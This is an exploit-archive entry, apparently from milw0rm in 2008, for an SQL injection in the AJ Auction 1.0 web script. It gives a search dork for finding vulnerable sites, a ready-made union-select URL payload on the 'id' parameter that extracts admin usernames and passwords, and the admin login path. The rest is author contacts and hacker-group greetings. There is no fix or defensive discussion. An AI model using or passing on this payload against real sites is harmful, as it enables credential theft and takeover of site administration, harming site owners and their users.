AJ Auction 1.0 - 'id' SQL Injection



EKU-ID: 13798 CVE: OSVDB-ID:
Author: Hussin X Published: 2008-06-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################
#
#    AJ Auction OOPD V.1  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#            hussin.x[at]hotmail[DoT]com                =
#                                                       =
#=========================================================
#    HomE script : http://www.ajauctionpro.com/ajhome.php
#
#    Demo : http://www.ajauctionpro.com/auction_2008/v1/
#
#          DorK :  Powered By AJ Auction
#
##########################################################

Exploit:

http://localhost.com/[PaTs]/[PaTs]/?do=allcat&id=-1+union+select+concat(user_name,0x3a,password)+from+admin_users--


Admin login

admin/adminindex.php

################################################################################
#####################################( Greetz )#################################
#                                                                              #
#           tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA              #
#                mos_chori / Rafi / FAHD / Iraq Hackers /                      #
#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################

# milw0rm.com [2008-06-19]